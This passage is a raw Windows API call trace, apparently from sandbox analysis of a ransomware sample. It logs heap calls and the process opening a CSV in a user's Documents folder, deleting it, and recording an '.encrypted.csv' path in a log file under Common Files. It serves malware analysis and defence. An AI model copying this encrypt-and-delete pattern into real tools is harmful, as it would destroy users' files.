lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.419] CharLowerBuffW (in: lpsz="byte[7169]", cchLength=0xa | out: lpsz="byte[7169]") returned 0xa [0036.419] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.419] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.420] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.420] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.421] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.421] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\pm4n5-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0036.421] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.422] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.422] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.422] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.422] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpFilePart=0x0) returned 0x44 [0036.422] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x156b2f20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 0x7c2100 [0036.422] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\pm4n5-.csv")) returned 1 [0036.424] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447c1820, ftCreationTime.dwHighDateTime=0x1d5bfca, ftLastAccessTime.dwLowDateTime=0x8ed2db60, ftLastAccessTime.dwHighDateTime=0x1d5c19c, ftLastWriteTime.dwLowDateTime=0x156b2f20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1c01, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="PM4N5-.csv", cAlternateFileName="")) returned 0 [0036.424] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.424] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.424] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.424] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.424] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.425] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.425] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.425] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.425] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.425] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0036.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.425] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.425] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.425] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.425] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.425] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.426] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.426] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1e60, lpOverlapped=0x0) returned 1 [0036.426] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.426] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.426] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.encrypted.csv\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0036.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0036.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.encrypted.csv\r\n", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.encrypted.csv\r\n", lpUsedDefaultChar=0x0) returned 81 [0036.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0036.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0036.427] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x50, lpOverlapped=0x0) returned 1 [0036.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.427] CloseHandle (hObject=0x140) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.428] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.429] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.429] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.430] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.430] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 